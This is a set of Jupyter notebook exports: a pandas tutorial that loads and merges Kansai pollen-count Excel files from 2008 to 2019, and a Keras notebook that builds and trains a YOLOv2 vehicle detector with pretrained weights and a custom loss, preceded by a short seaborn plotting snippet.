sns.pairplot(iris, hue="species", height=2.5);
```
```
g = sns.pairplot(iris, hue="species", palette="Set2", diag_kind="kde", height=2.5)
```
|
github_jupyter
|
**A note on this as hands-on material**
Normally you iterate in the same cell over and over, so only the cell that finally worked survives; failed cells don't remain, and nobody bothers to keep them.
For this hands-on I wanted to preserve the trial-and-error thought process, so even when an error or mistake occurs, I move on to the cell below and keep executing.
This style is only possible because notebooks run cell by cell. Nice.
(From the cells below, the notes are written in a terse style.)
kunai (@jdgthjdg)
---
# Tidying up the processing so far and joining the 2008-2019 data
## Rummaging through the xls/xlsx files
```
from pathlib import Path
base_dir = Path("../../../data") # the relative path may differ; adjusting the ../ should fix it
base_dir.exists()
list(base_dir.glob("*_kansai/*"))
p = list(base_dir.glob("*_kansai/*"))[0]
p.name
kansai_kafun_files = []
for p in base_dir.glob("*_kansai/*"):
    # exclude only the AMeDAS files
    if not p.name.startswith("AMeDAS"):
        kansai_kafun_files.append(p)
kansai_kafun_files
```
A lock file slipped in.<BR>
Excluding only AMeDAS also lets the .lock file through (it was generated because I had the file open in an Excel-compatible program at the time), so<br>
as an experiment, match on the **unreadable mojibake prefix ( ë╘ò▓âfü[â )** instead
```
kansai_kafun_files = []
for p in base_dir.glob("*_kansai/*"):
    # excluding only AMeDAS also lets the .lock file through, so match on the unreadable mojibake prefix instead
    if p.name.startswith("ë╘ò▓âfü[â"):
        kansai_kafun_files.append(p)
kansai_kafun_files
```
That worked (apparently it fails on some environments; in that case use the AMeDAS-exclusion pattern above).
We could sort here, but the date is taken from the data anyway, so leave it as is.
---
# Applying the processing so far
```
%matplotlib inline
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# settings so DataFrames etc. are not displayed at full length (to save screen space during the hands-on)
# threshold for the truncated (...) display of long output (unrelated to line wrapping)
pd.set_option('max_rows',10)
pd.set_option('max_columns',20) # beyond this, not every column is shown: A B C ... X Y Z
p = kansai_kafun_files[-1]
print(p)
df = pd.read_excel(p, skiprows=1).iloc[:,:-2]
df
str_concat_h0_23 = df["年"].astype(str)+"/"+df["月"].astype(str)+"/"+df["日"].astype(str)+"/"+(df["時"]-1).astype(str) # subtracting 1 from the hour
df["date_hour"] = pd.to_datetime(str_concat_h0_23, format="%Y/%m/%d/%H")
df.set_index("date_hour", inplace=True)
df = df.drop(columns=["年","月","日","時",]) # this way is fine too
df
```
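The `(df["時"]-1)` shift exists because the files appear to record hours as 1-24, which the `%H` format cannot parse; a toy reproduction of the same conversion (made-up rows):

```python
import pandas as pd

# toy frame mimicking the 年/月/日/時 columns, with the hour given as 1-24
toy = pd.DataFrame({"年": [2008, 2008], "月": [2, 2], "日": [1, 1], "時": [1, 24]})

# shift the hour to 0-23 before parsing, exactly as in the cell above
s = (toy["年"].astype(str) + "/" + toy["月"].astype(str) + "/"
     + toy["日"].astype(str) + "/" + (toy["時"] - 1).astype(str))
idx = pd.to_datetime(s, format="%Y/%m/%d/%H")
print(idx.tolist())
```

Hour 24 of a day thus becomes 23:00 of the same day, which keeps every row parseable.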
# Turning the steps so far into a function
A lot of trial and error went in, but it compressed down to just this much code...
```
def load_kafun_excel(path):
    df = pd.read_excel(path, skiprows=1).iloc[:,:-2]
    str_concat_h0_23 = df["年"].astype(str)+"/"+df["月"].astype(str)+"/"+df["日"].astype(str)+"/"+(df["時"]-1).astype(str) # subtracting 1 from the hour
    df["date_hour"] = pd.to_datetime(str_concat_h0_23, format="%Y/%m/%d/%H")
    df.set_index("date_hour", inplace=True)
    df = df.drop(columns=["年","月","日","時",]) # this way is fine too
    return df
load_kafun_excel(p)
```
## Looping over the files
```
kansai_kafun_files
kafun_df_list = []
for p in kansai_kafun_files:
    df = load_kafun_excel(p)
    kafun_df_list.append(df)
kafun_df_list[0].shape
```
# Concatenating the DataFrames in the list row-wise (vertically, along y)
### **[pd.concat](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html)**
Concatenating / joining / merging DataFrames
http://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html
```
kafun = pd.concat(kafun_df_list, axis=1)
kafun.shape
kafun.columns
```
<br>
Oops, the number of columns grew: the frames were joined horizontally.
<br>
<br>
```
kafun = pd.concat(kafun_df_list, axis=0) # Warning
```
We got a warning: pandas says it will stop sorting by default in the future.
```
kafun = pd.concat(kafun_df_list, axis=0, sort=False)
kafun.shape
```
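The axis mix-up above is easy to reproduce: with mismatched column names, `axis=1` grows the columns sideways, while `axis=0` stacks rows and fills unshared columns with NaN. A toy sketch:

```python
import pandas as pd

a = pd.DataFrame({"x": [1, 2]})
b = pd.DataFrame({"y": [3, 4]})

wide = pd.concat([a, b], axis=1)              # columns side by side -> shape (2, 2)
tall = pd.concat([a, b], axis=0, sort=False)  # rows stacked; unshared columns -> NaN
print(wide.shape, tall.shape)
```

So if the column names differ between years, even `axis=0` ends up with the union of all column names, which is exactly what happens below.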
Even along this axis the number of columns has roughly doubled...
```
kafun.columns
```
Apparently the column names changed when the year changed (and probably the person in charge did too).
When a data format changes, horribly tedious things happen...
```
kafun_df_list[0].columns
kafun_df_list[1].columns
```
# They differ far more than expected...
Look at the file names
```
kansai_kafun_files[0].name
kansai_kafun_files[1].name
```
Maybe things changed when xls became xlsx? For now, write a quick-and-dirty function that shows the columns on load and try it.
```
def show_columns(path):
    df = pd.read_excel(path, skiprows=1).iloc[:,:-2]
    return df.columns
for p in kansai_kafun_files:
    print(p, show_columns(p))
```
<br>
The years are out of order and hard to read, so sort after all
```
sorted(kansai_kafun_files)
```
---
**If the paths do not sort correctly, set sorted's key=**
```
p.name[10:14] # this slice extracts the year from the file name
# regardless of the folder name, this sorts numerically on the 20xx in the file name
sorted(kansai_kafun_files, key=lambda x:int(x.name[10:14]))
sorted(kansai_kafun_files, key=lambda x: (-1)*int(x.name[10:14])) # negating the key reverses the order
```
<br>
Look at the columns again after sorting
```
for p in sorted(kansai_kafun_files):
print(p, show_columns(p))
```
---
The moment the files switch to xlsx in 2015...<br>
At this rate we cannot trace the columns without the original Excel files or some footnote on the web page
Looking at the Excel file once more,
the old data had a separate sheet called "地点" (locations)!
The documentation says sheet_name accepts an index as well as a string.
If I had just been copying someone's blog I might never have noticed. (Note to self.)
```
names = pd.read_excel("../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls", sheet_name=1)
names
```
## Building a mapper to rename the columns
From here on it's a matter of hunting for suitable methods to cope...
Your pandas skills are put to the test...
A dict is best for mapping, so look for something dict-like
```
names["地点名"].to_dict()
```
<br>
We got a dict of key:value = index:column-value, so setting the index to the "地点名" column and calling .to_dict() against "施設名" should do it
```
rename_mapper = names.set_index("地点名")["施設名"].to_dict()
rename_mapper
```
This is it.
```
df.rename(columns=rename_mapper).head(1)
# OK
```
Embed it in the function
```
def load_kafun_excel_renamed_columns(path):
    df = pd.read_excel(path, skiprows=1).iloc[:,:-2]
    try:
        names = pd.read_excel(path, sheet_name=1)
        rename_mapper = names.set_index("地点名")["施設名"].to_dict()
        df = df.rename(columns=rename_mapper)
    except Exception as e:
        print(path, e)
    str_concat_h0_23 = df["年"].astype(str)+"/"+df["月"].astype(str)+"/"+df["日"].astype(str)+"/"+(df["時"]-1).astype(str) # subtracting 1 from the hour
    df["date_hour"] = pd.to_datetime(str_concat_h0_23, format="%Y/%m/%d/%H")
    df.set_index("date_hour", inplace=True)
    df = df.drop(columns=["年","月","日","時",]) # this way is fine too
    return df
kafun_df_list = []
for p in sorted(kansai_kafun_files):
    df = load_kafun_excel_renamed_columns(p)
    kafun_df_list.append(df)
kafun_renamed = pd.concat(kafun_df_list, axis=0, sort=False)
kafun_renamed.shape
```
Only the xlsx files raise errors, so the xls files seem to be reading fine
And the result?
```
kafun_renamed.columns
```
---
Sort to look for similar names
```
kafun_renamed.columns.sort_values()
```
---
**'北山緑化植物園' and '北山緑化植物園(西宮市都市整備公社)'**,
**'西播磨' and '西播磨県民局西播磨総合庁舎'** look like the same stations, don't they?
Column-name inconsistencies... (expected, but chasing them all down is too much work, so skipping it this time!)
Looking at the web page once more:
http://kafun.taiki.go.jp/library.html#4
>彦根地方気象台 (Hikone Local Meteorological Office), 彦根市城町2丁目5-25 — station 彦根, relocated from Hikone City Hall in FY2017
>舞鶴市西コミュニティセンター (Maizuru West Community Center), 舞鶴市字南田辺1番地 — station 舞鶴, relocated from the Kyoto Prefecture Chutan-Higashi Public Health Center in FY2017
## Tracking all of this down is a lot of work, and more than we need, so keep even the sparse columns and move on
---
## (Not doing it this time, but) if you wanted to drop the sparse columns
Finding every correspondence looks infeasible, so count the non-NaN values in each column and treat columns with few NaN as having kept the same name from 2008 through 2018
**count()** does exactly that
**sort_values** sorts the result
```
kafun_renamed.count().sort_values(ascending=True).head(10)
kafun_renamed.count().sort_values(ascending=False).head(10) # instead of False, using tail on the line above also works
```
---
# Save the data so far to a pickle
Save the DataFrame produced by the processing so far with pickle.
A pickle loads back in an instant.
You don't have to rewrite the read-the-csv-and-reshape code every time, so it's great as a temporary save point! (No need to redo the date parsing etc., hence fast)
```
kafun_renamed
kafun_renamed.to_pickle("kafun03.pkl")
```
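The save-point claim can be checked with a round trip; dtypes, including a datetime index, survive a pickle intact, which is what makes it faster than re-parsing a CSV (the temp path below is just for illustration):

```python
import os
import tempfile
import pandas as pd

df = pd.DataFrame({"v": [1.0, 2.0]},
                  index=pd.to_datetime(["2008-02-01", "2008-02-02"]))

# write to a throwaway temp file and read it back
path = os.path.join(tempfile.mkdtemp(), "tmp.pkl")
df.to_pickle(path)
restored = pd.read_pickle(path)
print(restored.equals(df))  # True
```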
# Plot the current data
```
kafun_renamed.京都府立医科大学.plot()
kafun_renamed.plot(legend=False)
kafun_renamed.tail()
```
|
github_jupyter
|
**Outline of Steps**
+ Initialization
+ Download COCO detection data from http://cocodataset.org/#download
+ http://images.cocodataset.org/zips/train2014.zip <= train images
+ http://images.cocodataset.org/zips/val2014.zip <= validation images
+ http://images.cocodataset.org/annotations/annotations_trainval2014.zip <= train and validation annotations
+ Run this script to convert annotations in COCO format to VOC format
+ https://gist.github.com/chicham/6ed3842d0d2014987186#file-coco2pascal-py
+ Download pre-trained weights from https://pjreddie.com/darknet/yolo/
+ https://pjreddie.com/media/files/yolo.weights
+ Specify the directory of train annotations (train_annot_folder) and train images (train_image_folder)
+ Specify the directory of validation annotations (valid_annot_folder) and validation images (valid_image_folder)
+ Specify the path of pre-trained weights by setting variable *wt_path*
+ Construct equivalent network in Keras
+ Network arch from https://github.com/pjreddie/darknet/blob/master/cfg/yolo-voc.cfg
+ Load the pretrained weights
+ Perform training
+ Perform detection on an image with newly trained weights
+ Perform detection on an video with newly trained weights
# Initialization
```
from keras.models import Sequential, Model
from keras.layers import Reshape, Activation, Conv2D, Input, MaxPooling2D, BatchNormalization, Flatten, Dense, Lambda
from keras.layers.advanced_activations import LeakyReLU
from keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard
from keras.optimizers import SGD, Adam, RMSprop
from keras.layers.merge import concatenate
import matplotlib.pyplot as plt
import keras.backend as K
import tensorflow as tf
import imgaug as ia
from tqdm import tqdm
from imgaug import augmenters as iaa
import numpy as np
import pickle
import os, cv2
from preprocessing import parse_annotation, BatchGenerator
from utils import WeightReader, decode_netout, draw_boxes
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
%matplotlib inline
LABELS = ["car", "truck", "pickup", "tractor", "camping car", "boat","motorcycle", "van", "other", "plane"]
IMAGE_H, IMAGE_W = 416, 416
GRID_H, GRID_W = 13 , 13
BOX = 5
CLASS = len(LABELS)
CLASS_WEIGHTS = np.ones(CLASS, dtype='float32')
OBJ_THRESHOLD = 0.3#0.5
NMS_THRESHOLD = 0.3#0.45
ANCHORS          = [0.88,1.69, 1.18,0.7, 1.65,1.77, 1.77,0.9, 3.75,3.57]
NO_OBJECT_SCALE = 1.0
OBJECT_SCALE = 5.0
COORD_SCALE = 1.0
CLASS_SCALE = 1.0
BATCH_SIZE = 16
WARM_UP_BATCHES = 0
TRUE_BOX_BUFFER = 50
wt_path = 'full_yolo_backend.h5'
train_image_folder = 'train_image_folder/'
train_annot_folder = 'train_annot_folder/'
valid_image_folder = 'valid_image_folder/'
valid_annot_folder = 'valid_annot_folder/'
```
# Construct the network
```
# the function to implement the reorganization layer (thanks to github.com/allanzelener/YAD2K)
def space_to_depth_x2(x):
    return tf.space_to_depth(x, block_size=2)
input_image = Input(shape=(IMAGE_H, IMAGE_W, 3))
true_boxes = Input(shape=(1, 1, 1, TRUE_BOX_BUFFER , 4))
# Layer 1
x = Conv2D(32, (3,3), strides=(1,1), padding='same', name='conv_1', use_bias=False)(input_image)
x = BatchNormalization(name='norm_1')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 2
x = Conv2D(64, (3,3), strides=(1,1), padding='same', name='conv_2', use_bias=False)(x)
x = BatchNormalization(name='norm_2')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 3
x = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_3', use_bias=False)(x)
x = BatchNormalization(name='norm_3')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 4
x = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_4', use_bias=False)(x)
x = BatchNormalization(name='norm_4')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 5
x = Conv2D(128, (3,3), strides=(1,1), padding='same', name='conv_5', use_bias=False)(x)
x = BatchNormalization(name='norm_5')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 6
x = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_6', use_bias=False)(x)
x = BatchNormalization(name='norm_6')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 7
x = Conv2D(128, (1,1), strides=(1,1), padding='same', name='conv_7', use_bias=False)(x)
x = BatchNormalization(name='norm_7')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 8
x = Conv2D(256, (3,3), strides=(1,1), padding='same', name='conv_8', use_bias=False)(x)
x = BatchNormalization(name='norm_8')(x)
x = LeakyReLU(alpha=0.1)(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 9
x = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_9', use_bias=False)(x)
x = BatchNormalization(name='norm_9')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 10
x = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_10', use_bias=False)(x)
x = BatchNormalization(name='norm_10')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 11
x = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_11', use_bias=False)(x)
x = BatchNormalization(name='norm_11')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 12
x = Conv2D(256, (1,1), strides=(1,1), padding='same', name='conv_12', use_bias=False)(x)
x = BatchNormalization(name='norm_12')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 13
x = Conv2D(512, (3,3), strides=(1,1), padding='same', name='conv_13', use_bias=False)(x)
x = BatchNormalization(name='norm_13')(x)
x = LeakyReLU(alpha=0.1)(x)
skip_connection = x
x = MaxPooling2D(pool_size=(2, 2))(x)
# Layer 14
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_14', use_bias=False)(x)
x = BatchNormalization(name='norm_14')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 15
x = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_15', use_bias=False)(x)
x = BatchNormalization(name='norm_15')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 16
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_16', use_bias=False)(x)
x = BatchNormalization(name='norm_16')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 17
x = Conv2D(512, (1,1), strides=(1,1), padding='same', name='conv_17', use_bias=False)(x)
x = BatchNormalization(name='norm_17')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 18
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_18', use_bias=False)(x)
x = BatchNormalization(name='norm_18')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 19
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_19', use_bias=False)(x)
x = BatchNormalization(name='norm_19')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 20
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_20', use_bias=False)(x)
x = BatchNormalization(name='norm_20')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 21
skip_connection = Conv2D(64, (1,1), strides=(1,1), padding='same', name='conv_21', use_bias=False)(skip_connection)
skip_connection = BatchNormalization(name='norm_21')(skip_connection)
skip_connection = LeakyReLU(alpha=0.1)(skip_connection)
skip_connection = Lambda(space_to_depth_x2)(skip_connection)
x = concatenate([skip_connection, x])
# Layer 22
x = Conv2D(1024, (3,3), strides=(1,1), padding='same', name='conv_22', use_bias=False)(x)
x = BatchNormalization(name='norm_22')(x)
x = LeakyReLU(alpha=0.1)(x)
# Layer 23
x = Conv2D(BOX * (4 + 1 + CLASS), (1,1), strides=(1,1), padding='same', name='conv_23')(x)
output = Reshape((GRID_H, GRID_W, BOX, 4 + 1 + CLASS))(x)
# small hack to allow true_boxes to be registered when Keras build the model
# for more information: https://github.com/fchollet/keras/issues/2790
output = Lambda(lambda args: args[0])([output, true_boxes])
model = Model([input_image, true_boxes], output)
model.summary()
```
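`tf.space_to_depth` in the skip connection rearranges each 2x2 spatial block into channels, turning the 26x26x64 map from `conv_21` into 13x13x256 before concatenation with the main path. A NumPy sketch of the shape effect (illustrative only; TF's exact channel ordering may differ):

```python
import numpy as np

def space_to_depth_np(x, block=2):
    # (H, W, C) -> (H//block, W//block, C*block*block)
    h, w, c = x.shape
    x = x.reshape(h // block, block, w // block, block, c)
    x = x.transpose(0, 2, 1, 3, 4)
    return x.reshape(h // block, w // block, c * block * block)

feat = np.zeros((26, 26, 64), dtype=np.float32)  # the reduced skip map in this model
out = space_to_depth_np(feat)
print(out.shape)  # (13, 13, 256)
```

This is what lets a 26x26 feature map be concatenated with the 13x13 main branch without losing spatial detail.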
# Load pretrained weights
**Load the weights originally provided by YOLO**
```
weight_reader = WeightReader(wt_path)
weight_reader.reset()
nb_conv = 23
for i in range(1, nb_conv+1):
    conv_layer = model.get_layer('conv_' + str(i))
    if i < nb_conv:
        norm_layer = model.get_layer('norm_' + str(i))
        size = np.prod(norm_layer.get_weights()[0].shape)
        beta  = weight_reader.read_bytes(size)
        gamma = weight_reader.read_bytes(size)
        mean  = weight_reader.read_bytes(size)
        var   = weight_reader.read_bytes(size)
        norm_layer.set_weights([gamma, beta, mean, var])
    if len(conv_layer.get_weights()) > 1:
        bias = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[1].shape))
        kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
        kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
        kernel = kernel.transpose([2,3,1,0])
        conv_layer.set_weights([kernel, bias])
    else:
        kernel = weight_reader.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
        kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
        kernel = kernel.transpose([2,3,1,0])
        conv_layer.set_weights([kernel])
```
**Randomize weights of the last layer**
```
layer = model.layers[-4] # the last convolutional layer
weights = layer.get_weights()
new_kernel = np.random.normal(size=weights[0].shape)/(GRID_H*GRID_W)
new_bias = np.random.normal(size=weights[1].shape)/(GRID_H*GRID_W)
layer.set_weights([new_kernel, new_bias])
```
# Perform training
**Loss function**
$$\begin{multline}
\lambda_\textbf{coord}
\sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{obj}}
\left[
\left(
x_i - \hat{x}_i
\right)^2 +
\left(
y_i - \hat{y}_i
\right)^2
\right]
\\
+ \lambda_\textbf{coord}
\sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{obj}}
\left[
\left(
\sqrt{w_i} - \sqrt{\hat{w}_i}
\right)^2 +
\left(
\sqrt{h_i} - \sqrt{\hat{h}_i}
\right)^2
\right]
\\
+ \sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{obj}}
\left(
C_i - \hat{C}_i
\right)^2
\\
+ \lambda_\textrm{noobj}
\sum_{i = 0}^{S^2}
\sum_{j = 0}^{B}
L_{ij}^{\text{noobj}}
\left(
C_i - \hat{C}_i
\right)^2
\\
+ \sum_{i = 0}^{S^2}
L_i^{\text{obj}}
\sum_{c \in \textrm{classes}}
\left(
p_i(c) - \hat{p}_i(c)
\right)^2
\end{multline}$$
```
def custom_loss(y_true, y_pred):
    mask_shape = tf.shape(y_true)[:4]
    cell_x = tf.to_float(tf.reshape(tf.tile(tf.range(GRID_W), [GRID_H]), (1, GRID_H, GRID_W, 1, 1)))
    cell_y = tf.transpose(cell_x, (0,2,1,3,4))
    cell_grid = tf.tile(tf.concat([cell_x,cell_y], -1), [BATCH_SIZE, 1, 1, 5, 1])
    coord_mask = tf.zeros(mask_shape)
    conf_mask = tf.zeros(mask_shape)
    class_mask = tf.zeros(mask_shape)
    seen = tf.Variable(0.)
    total_recall = tf.Variable(0.)
    """
    Adjust prediction
    """
    ### adjust x and y
    pred_box_xy = tf.sigmoid(y_pred[..., :2]) + cell_grid
    ### adjust w and h
    pred_box_wh = tf.exp(y_pred[..., 2:4]) * np.reshape(ANCHORS, [1,1,1,BOX,2])
    ### adjust confidence
    pred_box_conf = tf.sigmoid(y_pred[..., 4])
    ### adjust class probabilities
    pred_box_class = y_pred[..., 5:]
    """
    Adjust ground truth
    """
    ### adjust x and y
    true_box_xy = y_true[..., 0:2] # relative position to the containing cell
    ### adjust w and h
    true_box_wh = y_true[..., 2:4] # number of cells across, horizontally and vertically
    ### adjust confidence
    true_wh_half = true_box_wh / 2.
    true_mins = true_box_xy - true_wh_half
    true_maxes = true_box_xy + true_wh_half
    pred_wh_half = pred_box_wh / 2.
    pred_mins = pred_box_xy - pred_wh_half
    pred_maxes = pred_box_xy + pred_wh_half
    intersect_mins = tf.maximum(pred_mins, true_mins)
    intersect_maxes = tf.minimum(pred_maxes, true_maxes)
    intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)
    intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]
    true_areas = true_box_wh[..., 0] * true_box_wh[..., 1]
    pred_areas = pred_box_wh[..., 0] * pred_box_wh[..., 1]
    union_areas = pred_areas + true_areas - intersect_areas
    iou_scores = tf.truediv(intersect_areas, union_areas)
    true_box_conf = iou_scores * y_true[..., 4]
    ### adjust class probabilities
    true_box_class = tf.argmax(y_true[..., 5:], -1)
    """
    Determine the masks
    """
    ### coordinate mask: simply the position of the ground truth boxes (the predictors)
    coord_mask = tf.expand_dims(y_true[..., 4], axis=-1) * COORD_SCALE
    ### confidence mask: penalize predictors + penalize boxes with low IOU
    # penalize the confidence of the boxes, which have IOU with some ground truth box < 0.6
    true_xy = true_boxes[..., 0:2]
    true_wh = true_boxes[..., 2:4]
    true_wh_half = true_wh / 2.
    true_mins = true_xy - true_wh_half
    true_maxes = true_xy + true_wh_half
    pred_xy = tf.expand_dims(pred_box_xy, 4)
    pred_wh = tf.expand_dims(pred_box_wh, 4)
    pred_wh_half = pred_wh / 2.
    pred_mins = pred_xy - pred_wh_half
    pred_maxes = pred_xy + pred_wh_half
    intersect_mins = tf.maximum(pred_mins, true_mins)
    intersect_maxes = tf.minimum(pred_maxes, true_maxes)
    intersect_wh = tf.maximum(intersect_maxes - intersect_mins, 0.)
    intersect_areas = intersect_wh[..., 0] * intersect_wh[..., 1]
    true_areas = true_wh[..., 0] * true_wh[..., 1]
    pred_areas = pred_wh[..., 0] * pred_wh[..., 1]
    union_areas = pred_areas + true_areas - intersect_areas
    iou_scores = tf.truediv(intersect_areas, union_areas)
    best_ious = tf.reduce_max(iou_scores, axis=4)
    conf_mask = conf_mask + tf.to_float(best_ious < 0.6) * (1 - y_true[..., 4]) * NO_OBJECT_SCALE
    # penalize the confidence of the boxes, which are responsible for corresponding ground truth box
    conf_mask = conf_mask + y_true[..., 4] * OBJECT_SCALE
    ### class mask: simply the position of the ground truth boxes (the predictors)
    class_mask = y_true[..., 4] * tf.gather(CLASS_WEIGHTS, true_box_class) * CLASS_SCALE
    """
    Warm-up training
    """
    no_boxes_mask = tf.to_float(coord_mask < COORD_SCALE/2.)
    seen = tf.assign_add(seen, 1.)
    true_box_xy, true_box_wh, coord_mask = tf.cond(tf.less(seen, WARM_UP_BATCHES),
                          lambda: [true_box_xy + (0.5 + cell_grid) * no_boxes_mask,
                                   true_box_wh + tf.ones_like(true_box_wh) * np.reshape(ANCHORS, [1,1,1,BOX,2]) * no_boxes_mask,
                                   tf.ones_like(coord_mask)],
                          lambda: [true_box_xy,
                                   true_box_wh,
                                   coord_mask])
    """
    Finalize the loss
    """
    nb_coord_box = tf.reduce_sum(tf.to_float(coord_mask > 0.0))
    nb_conf_box = tf.reduce_sum(tf.to_float(conf_mask > 0.0))
    nb_class_box = tf.reduce_sum(tf.to_float(class_mask > 0.0))
    loss_xy = tf.reduce_sum(tf.square(true_box_xy-pred_box_xy) * coord_mask) / (nb_coord_box + 1e-6) / 2.
    loss_wh = tf.reduce_sum(tf.square(true_box_wh-pred_box_wh) * coord_mask) / (nb_coord_box + 1e-6) / 2.
    loss_conf = tf.reduce_sum(tf.square(true_box_conf-pred_box_conf) * conf_mask) / (nb_conf_box + 1e-6) / 2.
    loss_class = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=true_box_class, logits=pred_box_class)
    loss_class = tf.reduce_sum(loss_class * class_mask) / (nb_class_box + 1e-6)
    loss = loss_xy + loss_wh + loss_conf + loss_class
    nb_true_box = tf.reduce_sum(y_true[..., 4])
    nb_pred_box = tf.reduce_sum(tf.to_float(true_box_conf > 0.5) * tf.to_float(pred_box_conf > 0.3))
    """
    Debugging code
    """
    current_recall = nb_pred_box/(nb_true_box + 1e-6)
    total_recall = tf.assign_add(total_recall, current_recall)
    loss = tf.Print(loss, [tf.zeros((1))], message='Dummy Line \t', summarize=1000)
    loss = tf.Print(loss, [loss_xy], message='Loss XY \t', summarize=1000)
    loss = tf.Print(loss, [loss_wh], message='Loss WH \t', summarize=1000)
    loss = tf.Print(loss, [loss_conf], message='Loss Conf \t', summarize=1000)
    loss = tf.Print(loss, [loss_class], message='Loss Class \t', summarize=1000)
    loss = tf.Print(loss, [loss], message='Total Loss \t', summarize=1000)
    loss = tf.Print(loss, [current_recall], message='Current Recall \t', summarize=1000)
    loss = tf.Print(loss, [total_recall/seen], message='Average Recall \t', summarize=1000)
    return loss
```
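The IoU computation inside `custom_loss` (half-extents, elementwise min/max, clipped intersection) can be sanity-checked on plain boxes in center/width-height form; a NumPy sketch with hand-picked boxes:

```python
import numpy as np

def iou_cxcywh(a, b):
    # a, b: (cx, cy, w, h), the same convention as the loss above
    a_min = np.array(a[:2]) - np.array(a[2:]) / 2.
    a_max = np.array(a[:2]) + np.array(a[2:]) / 2.
    b_min = np.array(b[:2]) - np.array(b[2:]) / 2.
    b_max = np.array(b[:2]) + np.array(b[2:]) / 2.
    # intersection width/height, clipped at zero for disjoint boxes
    inter_wh = np.maximum(np.minimum(a_max, b_max) - np.maximum(a_min, b_min), 0.)
    inter = inter_wh[0] * inter_wh[1]
    union = a[2] * a[3] + b[2] * b[3] - inter
    return inter / union

iou_same = iou_cxcywh((5, 5, 2, 2), (5, 5, 2, 2))    # identical boxes -> 1.0
iou_none = iou_cxcywh((0, 0, 1, 1), (10, 10, 1, 1))  # disjoint boxes  -> 0.0
print(iou_same, iou_none)
```

The clipping via `np.maximum(..., 0.)` mirrors the `tf.maximum(intersect_maxes - intersect_mins, 0.)` line, which is what keeps disjoint boxes from producing a negative "intersection".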
**Parse the annotations to construct train generator and validation generator**
```
generator_config = {
'IMAGE_H' : IMAGE_H,
'IMAGE_W' : IMAGE_W,
'GRID_H' : GRID_H,
'GRID_W' : GRID_W,
'BOX' : BOX,
'LABELS' : LABELS,
'CLASS' : len(LABELS),
'ANCHORS' : ANCHORS,
'BATCH_SIZE' : BATCH_SIZE,
'TRUE_BOX_BUFFER' : 50,
}
def normalize(image):
return image / 255.
train_imgs, seen_train_labels = parse_annotation(train_annot_folder, train_image_folder, labels=LABELS)
### write parsed annotations to pickle for fast retrieval next time
#with open('train_imgs', 'wb') as fp:
# pickle.dump(train_imgs, fp)
### read saved pickle of parsed annotations
#with open ('train_imgs', 'rb') as fp:
# train_imgs = pickle.load(fp)
train_batch = BatchGenerator(train_imgs, generator_config, norm=normalize)
valid_imgs, seen_valid_labels = parse_annotation(valid_annot_folder, valid_image_folder, labels=LABELS)
### write parsed annotations to pickle for fast retrieval next time
#with open('valid_imgs', 'wb') as fp:
# pickle.dump(valid_imgs, fp)
### read saved pickle of parsed annotations
#with open ('valid_imgs', 'rb') as fp:
# valid_imgs = pickle.load(fp)
valid_batch = BatchGenerator(valid_imgs, generator_config, norm=normalize, jitter=False)
```
**Setup a few callbacks and start the training**
```
early_stop = EarlyStopping(monitor='val_loss',
min_delta=0.001,
patience=10,
mode='min',
verbose=1)
checkpoint = ModelCheckpoint('weights_truck2.h5',
monitor='val_loss',
verbose=1,
save_best_only=True,
mode='min',
period=1)
tb_counter = len([log for log in os.listdir(os.path.expanduser('~/logs/')) if 'truck_' in log]) + 1
tensorboard = TensorBoard(log_dir=os.path.expanduser('~/logs/') + 'truck_' + '_' + str(tb_counter),
histogram_freq=0,
write_graph=True,
write_images=False)
